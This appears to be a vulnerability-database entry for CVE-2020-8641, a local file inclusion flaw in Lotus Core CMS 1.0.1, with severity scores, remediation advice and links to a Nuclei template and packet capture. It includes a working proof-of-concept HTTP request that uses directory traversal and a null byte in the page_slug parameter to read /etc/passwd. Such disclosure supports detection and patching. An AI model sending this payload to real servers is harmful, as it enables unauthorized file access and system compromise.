| Title | Lotus Core CMS 1.0.1 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. |
| Remediation | Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability. |
| CVSS Score | 8.8 |
| EPSS Score | 0.72611 |
| CVE ID | CVE-2020-8641 |
| CWE ID | CWE-22 |
| Tags | cve cve2020 lfi lotus cms edb lotus_core_cms_project vuln |
Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.
GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8641.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-8641.pcap
N/AN/A